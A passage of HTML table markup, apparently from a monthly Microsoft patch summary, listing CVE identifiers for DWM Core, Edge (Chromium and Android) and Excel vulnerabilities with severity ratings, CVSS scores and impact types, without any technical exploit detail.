  Endpoint for Mac Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">4.7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50329"><span>CVE-2026-50329</span></a></td>
  <td width="256" class="xl74">Microsoft DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58541"><span>CVE-2026-58541</span></a></td>
  <td width="256" class="xl74">Microsoft DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58596"><span>CVE-2026-58596</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57991"><span>CVE-2026-57991</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58291"><span>CVE-2026-58291</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57981"><span>CVE-2026-57981</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57984"><span>CVE-2026-57984</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57985"><span>CVE-2026-57985</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57986"><span>CVE-2026-57986</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57988"><span>CVE-2026-57988</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57992"><span>CVE-2026-57992</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58276"><span>CVE-2026-58276</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56645"><span>CVE-2026-56645</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57974"><span>CVE-2026-57974</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57975"><span>CVE-2026-57975</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58281"><span>CVE-2026-58281</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58284"><span>CVE-2026-58284</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58285"><span>CVE-2026-58285</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58287"><span>CVE-2026-58287</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58288"><span>CVE-2026-58288</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58289"><span>CVE-2026-58289</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">9</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58290"><span>CVE-2026-58290</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58292"><span>CVE-2026-58292</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58293"><span>CVE-2026-58293</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58294"><span>CVE-2026-58294</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57983"><span>CVE-2026-57983</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58295"><span>CVE-2026-58295</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58525"><span>CVE-2026-58525</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57987"><span>CVE-2026-57987</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58278"><span>CVE-2026-58278</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56646"><span>CVE-2026-56646</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57977"><span>CVE-2026-57977</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57993"><span>CVE-2026-57993</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58282"><span>CVE-2026-58282</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58283"><span>CVE-2026-58283</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58286"><span>CVE-2026-58286</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58298"><span>CVE-2026-58298</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58524"><span>CVE-2026-58524</span></a></td>
  <td width="256" class="xl74">Microsoft Edge
  (Chromium-based) Spoofing Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58296"><span>CVE-2026-58296</span></a></td>
  <td width="256" class="xl74">Microsoft Edge for
  Android Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58297"><span>CVE-2026-58297</span></a></td>
  <td width="256" class="xl74">Microsoft Edge for
  Android Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58300"><span>CVE-2026-58300</span></a></td>
  <td width="256" class="xl74">Microsoft Edge for
  Android Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58522"><span>CVE-2026-58522</span></a></td>
  <td width="256" class="xl74">Microsoft Edge for
  Android Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58299"><span>CVE-2026-58299</span></a></td>
  <td width="256" class="xl74">Microsoft Edge for
  Android Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58523"><span>CVE-2026-58523</span></a></td>
  <td width="256" class="xl74">Microsoft Edge for
  Android Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50678"><span>CVE-2026-50678</span></a></td>
  <td width="256" class="xl74">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54988"><span>CVE-2026-54988</span></a></td>
  <td width="256" class="xl74">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48580"><span>CVE-2026-48580</span></a></td>
  <td width="256" class="xl74">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50408"><span>CVE-2026-50408</span></a></td>
  <td width="256" class="xl74">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55046"><span>CVE-2026-55046</span></a></td>
  <td width="256" class="xl74">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55138"><span>CVE-2026-55138</span></a></td>
  <td width="256" class="xl74">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55054"><span>CVE-2026-55054</span></a></td>
  <td width="256" class="xl74">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55122"><span>CVE-2026-55122</span></a></td>
  <td width="256" class="xl74">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55898"><span>CVE-2026-55898</span></a></td>
  <td width="256" class="xl74">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50675"><span>CVE-2026-50675</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55899"><span>CVE-2026-55899</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55948"><span>CVE-2026-55948</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58618"><span>CVE-2026-58618</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47642"><span>CVE-2026-47642</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55024"><span>CVE-2026-55024</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55025"><span>CVE-2026-55025</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55031"><span>CVE-2026-55031</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55048"><span>CVE-2026-55048</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55029"><span>CVE-2026-55029</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55039"><span>CVE-2026-55039</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55136"><span>CVE-2026-55136</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55141"><span>CVE-2026-55141</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55036"><span>CVE-2026-55036</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55044"><span>CVE-2026-55044</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55037"><span>CVE-2026-55037</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55058"><span>CVE-2026-55058</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55137"><span>CVE-2026-55137</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55053"><span>CVE-2026-55053</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
